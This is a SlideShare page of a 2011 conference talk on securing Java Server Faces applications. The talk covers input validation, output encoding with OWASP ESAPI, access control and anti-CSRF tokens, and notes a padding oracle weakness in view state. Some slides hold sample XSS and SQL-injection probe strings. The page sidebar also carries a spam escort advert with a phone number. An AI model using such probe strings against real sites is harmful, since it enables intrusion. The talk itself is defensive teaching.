Soumettre la recherche
Mettre en ligne
JSF Security
•
4 j'aime
•
5,280 vues
Source Conference
Suivre
SOURCE Seattle 2011 - Krishna Raja
Lire moins
Lire la suite
Technologie
Signaler
Partager
Signaler
Partager
1 sur 24
Télécharger maintenant
Télécharger pour lire hors ligne
Recommandé
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
Aditya K Sood
Introduction to OWASP & Web Application Security
Introduction to OWASP & Web Application Security
OWASPKerala
Secure coding-guidelines
Secure coding-guidelines
Trupti Shiralkar, CISSP
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Aleksandar Bozinovski
Octopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EE
Rudy De Busscher
Java Security Framework's
Java Security Framework's
Mohammed Fazuluddin
Java Security
Java Security
elliando dias
David Thiel - Secure Development On iOS
David Thiel - Secure Development On iOS
Source Conference
Recommandé
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
Aditya K Sood
Introduction to OWASP & Web Application Security
Introduction to OWASP & Web Application Security
OWASPKerala
Secure coding-guidelines
Secure coding-guidelines
Trupti Shiralkar, CISSP
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Aleksandar Bozinovski
Octopus framework; Permission based security framework for Java EE
Octopus framework; Permission based security framework for Java EE
Rudy De Busscher
Java Security Framework's
Java Security Framework's
Mohammed Fazuluddin
Java Security
Java Security
elliando dias
David Thiel - Secure Development On iOS
David Thiel - Secure Development On iOS
Source Conference
JavaEE Security
JavaEE Security
Alex Kim
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missing
Masoud Kalali
Servlet to Spring: Internal Understanding
Servlet to Spring: Internal Understanding
Knoldus Inc.
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Codemotion
Developing With JAAS
Developing With JAAS
rahmed_sct
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Enrico Micco
Creating Secure Applications
Creating Secure Applications
guest879f38
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Waratek Ltd
Spring security jwt tutorial toptal
Spring security jwt tutorial toptal
jbsysatm
Java EE Application Security With PicketLink
Java EE Application Security With PicketLink
pigorcraveiro
Spring security 2017
Spring security 2017
Vortexbird
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Kenneth Peeples
Struts & hibernate ppt
Struts & hibernate ppt
Pankaj Patel
Brisk WebApp penetration tester
Brisk WebApp penetration tester
BriskInfosec Solutions
Secure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
Sebastien Gioria
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
gmaran23
Struts Interview Questions
Struts Interview Questions
jbashask
Struts presentation
Struts presentation
Nicolaescu Petru
Owasp Backend Security Project 1.0beta
Owasp Backend Security Project 1.0beta
Security Date
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
Contenu connexe
Tendances
JavaEE Security
JavaEE Security
Alex Kim
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missing
Masoud Kalali
Servlet to Spring: Internal Understanding
Servlet to Spring: Internal Understanding
Knoldus Inc.
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Codemotion
Developing With JAAS
Developing With JAAS
rahmed_sct
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Enrico Micco
Creating Secure Applications
Creating Secure Applications
guest879f38
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Waratek Ltd
Spring security jwt tutorial toptal
Spring security jwt tutorial toptal
jbsysatm
Java EE Application Security With PicketLink
Java EE Application Security With PicketLink
pigorcraveiro
Spring security 2017
Spring security 2017
Vortexbird
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Kenneth Peeples
Struts & hibernate ppt
Struts & hibernate ppt
Pankaj Patel
Brisk WebApp penetration tester
Brisk WebApp penetration tester
BriskInfosec Solutions
Secure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
Sebastien Gioria
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
gmaran23
Struts Interview Questions
Struts Interview Questions
jbashask
Struts presentation
Struts presentation
Nicolaescu Petru
Owasp Backend Security Project 1.0beta
Owasp Backend Security Project 1.0beta
Security Date
Tendances
(19)
JavaEE Security
JavaEE Security
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missing
Servlet to Spring: Internal Understanding
Servlet to Spring: Internal Understanding
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Martin Toshev - Java Security Architecture - Codemotion Rome 2019
Developing With JAAS
Developing With JAAS
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Untrusted JS Detection with Chrome Dev Tools and static code analysis
Creating Secure Applications
Creating Secure Applications
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong
Spring security jwt tutorial toptal
Spring security jwt tutorial toptal
Java EE Application Security With PicketLink
Java EE Application Security With PicketLink
Spring security 2017
Spring security 2017
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Struts & hibernate ppt
Struts & hibernate ppt
Brisk WebApp penetration tester
Brisk WebApp penetration tester
Secure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Struts Interview Questions
Struts Interview Questions
Struts presentation
Struts presentation
Owasp Backend Security Project 1.0beta
Owasp Backend Security Project 1.0beta
Similaire à JSF Security
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
Node.js vs Play Framework
Node.js vs Play Framework
Yevgeniy Brikman
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
Puma Security, LLC
Attacking HTML5
Attacking HTML5
AppSec_Labs
Jetpack, with new features in 2021 GDG Georgetown IO Extended
Jetpack, with new features in 2021 GDG Georgetown IO Extended
Toru Wonyoung Choi
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
How to React to JavaScript Insecurity
How to React to JavaScript Insecurity
Ksenia Peguero
WinAppDriver - Windows Store Apps Test Automation
WinAppDriver - Windows Store Apps Test Automation
Jeremy Kao
Spark IT 2011 - Simplified Web Development using Java Server Faces 2.0
Spark IT 2011 - Simplified Web Development using Java Server Faces 2.0
Arun Gupta
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
chadtindel
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
25+ Reasons to use OmniFaces in JSF applications
25+ Reasons to use OmniFaces in JSF applications
Anghel Leonard
Top 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
Hyperproductive JSF 2.0 @ JavaOne Brazil 2010
Hyperproductive JSF 2.0 @ JavaOne Brazil 2010
Arun Gupta
Similaire à JSF Security
(20)
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
Node.js vs Play Framework
Node.js vs Play Framework
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
Attacking HTML5
Attacking HTML5
Jetpack, with new features in 2021 GDG Georgetown IO Extended
Jetpack, with new features in 2021 GDG Georgetown IO Extended
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
How to React to JavaScript Insecurity
How to React to JavaScript Insecurity
WinAppDriver - Windows Store Apps Test Automation
WinAppDriver - Windows Store Apps Test Automation
Spark IT 2011 - Simplified Web Development using Java Server Faces 2.0
Spark IT 2011 - Simplified Web Development using Java Server Faces 2.0
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
25+ Reasons to use OmniFaces in JSF applications
25+ Reasons to use OmniFaces in JSF applications
Top 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Hyperproductive JSF 2.0 @ JavaOne Brazil 2010
Hyperproductive JSF 2.0 @ JavaOne Brazil 2010
Plus de Source Conference
Million Browser Botnet
Million Browser Botnet
Source Conference
iBanking - a botnet on Android
iBanking - a botnet on Android
Source Conference
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
Source Conference
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and Bobs
Source Conference
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus Derivatives
Source Conference
How to Like Social Media Network Security
How to Like Social Media Network Security
Source Conference
Wfuzz para Penetration Testers
Wfuzz para Penetration Testers
Source Conference
Security Goodness with Ruby on Rails
Security Goodness with Ruby on Rails
Source Conference
Securty Testing For RESTful Applications
Securty Testing For RESTful Applications
Source Conference
Esteganografia
Esteganografia
Source Conference
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the Browser
Source Conference
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done It
Source Conference
Adapting To The Age Of Anonymous
Adapting To The Age Of Anonymous
Source Conference
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?
Source Conference
Advanced (persistent) binary planting
Advanced (persistent) binary planting
Source Conference
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Source Conference
Who should the security team hire next?
Who should the security team hire next?
Source Conference
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime Law
Source Conference
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security Spend
Source Conference
Everything you should already know about MS-SQL post-exploitation
Everything you should already know about MS-SQL post-exploitation
Source Conference
Plus de Source Conference
(20)
Million Browser Botnet
Million Browser Botnet
iBanking - a botnet on Android
iBanking - a botnet on Android
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and Bobs
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus Derivatives
How to Like Social Media Network Security
How to Like Social Media Network Security
Wfuzz para Penetration Testers
Wfuzz para Penetration Testers
Security Goodness with Ruby on Rails
Security Goodness with Ruby on Rails
Securty Testing For RESTful Applications
Securty Testing For RESTful Applications
Esteganografia
Esteganografia
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the Browser
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done It
Adapting To The Age Of Anonymous
Adapting To The Age Of Anonymous
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?
Advanced (persistent) binary planting
Advanced (persistent) binary planting
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Who should the security team hire next?
Who should the security team hire next?
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime Law
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security Spend
Everything you should already know about MS-SQL post-exploitation
Everything you should already know about MS-SQL post-exploitation
Dernier
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Deepika Singh
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
apidays
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
jfdjdjcjdnsjd
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
apidays
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Rustici Software
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
Architecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Juan lago vázquez
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
lior mazor
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
Overkill Security
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
Dernier
(20)
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
presentation ICT roal in 21st century education
presentation ICT roal in 21st century education
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
Architecting Cloud Native Applications
Architecting Cloud Native Applications
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
JSF Security
1.
JSF Security © 2011
Security Compass inc. 1
2.
JSF Input Validation
abcd <script> 24c;-- Validated Input © 2011 Security Compass inc. 2
3.
MyFaces: validateRegExpr Tag <%@
taglib uri="http://myfaces.apache.org/tomahawk" prefix="t" %> Using Apache Tomahawk tag library <h:outputLabel for="zip1" value="Zip"/> <t:inputText value="#{order.zipCode}" id="zip1"> <t:validateRegExpr pattern="d{5}" message="ZIP Code must be 5 digits"/> </t:inputText> © 2011 Security Compass inc. 3
4.
Facelets Implementation <html ... xmlns:ui="http://java.sun.com/jsf/facelets" xmlns:t="http://myfaces.apache.org/tomahawk"> <h:inputText
type="text" id="val“ value="#{SimpleBean.val}" required="true"> <t:validateRegExpr pattern="[a-zA-Z]{1,100}" /> </h:inputText> © 2011 Security Compass inc. 4
5.
Demo: Facelets validation
6.
Mojarra Validators xmlns:mj=http://mojarra.dev.java.net/mojarra_ext <h:inputText type="text"
id="val“ value="#{SimpleBean.val}" required="true"> <mj:regexValidator pattern="[a-zA-Z]{1,50}"/> </h:inputText> There also exists: <mj:creditCardValidator/> © 2011 Security Compass inc. 6
7.
JSF 2.0 Validators •
Part of JSF 2.0 core tag library • Can leverage: – <f:validateLength …/> – <f:validateLongRange …/> – <f:validateDoubleRange …/> – <f:validateRegex pattern=“…”/> © 2011 Security Compass inc. 7
8.
Demo: JSF 2.0
Validators
9.
Other JSF Validation
Techniques • Validation in Action Controller – Validation tied closely to biz logic – Dependence between different fields • Custom validation methods – More complex validation (i.e. built-in JSF validator doesn’t suit your need) © 2011 Security Compass inc. 9
10.
Output Encoding in
JSF <script>alert('xss') < > (') © 2011 Security Compass inc. 10
11.
<h:outputText> & <h:outputFormat> <h:outputText
value="#{param.name}"/> escape attribute is set to “true” by default <h:outputFormat value=“#{param.name}”/> © 2011 Security Compass inc. 11
12.
Output encoding with
Facelets <ui:define name="body"> This will safely encode as an HTML element in a Facelet: <h:outputText value="#{SimpleBean.val}"> </h:outputText> </ui:define> EL expression is automatically encoded © 2011 Security Compass inc. 12
13.
But there’s a
problem … • <h:outputText> and <h:outputFormat> cannot be used safely within: – HTML attribute – JavaScript or CSS • Similar problem with: Facelets ${bean.name} © 2011 Security Compass inc. 13
14.
Problems with RichFaces •
Some tags can lead to XSS • Never use user-supplied data with: – <a4j:loadScript> – <a4j:loadStyle> – <rich:componentControl> • Known vulnerabilities exist with: <rich:editor>, <rich:effect>, <rich:gmap>, <rich:virtualEarth> © 2011 Security Compass inc. 14
15.
Solution: OWASP ESAPI
EL <p> <input type="text“ value="${esapi:encodeForHTMLAttribute(dangerous)}"/> </p> <p> <script language="javascript"> var str=${esapi:encodeForJavaScript(dangerous)}; </script> </p> © 2011 Security Compass inc. 15
16.
Demo: ESAPI encoding
17.
Page Level Authorization
18.
ESAPI AccessController • Interface
that provides access control for – URLs – Business functions – Data services & files • Contains: – assertAuthorizedForURL(String URL) © 2011 Security Compass inc. 18
19.
Demo: AccessController
20.
Defending Against CSRF Anti-CSRF
tokens
21.
What about JSF
“view state”? • javax.faces.STATE_SAVING_METHOD – Can save and restore state of the view between requests to server STATE_SAVING_METHOD + JSESSIONID = Anti-CSRF Token ??? © 2011 Security Compass inc. 21
22.
Problem: Padding Oracle
Attack • Recently discovered exploit against CBC- mode encryption with PKCS#5 padding • Incorrect padding can result in java.crypto.BadPaddingException • Can use to decrypt STATE_SAVING_METHOD © 2011 Security Compass inc. 22
23.
Solution: OWASP CSRF
Guard • Version 3 recently released! • Library that injects per-session or per- request tokens into HTML • Can use 2 strategies to inject token: – JavaScript DOM Manipulation – JSP Tag Library © 2011 Security Compass inc. 23
24.
Demo: Anti-CSRF Tokens
Télécharger maintenant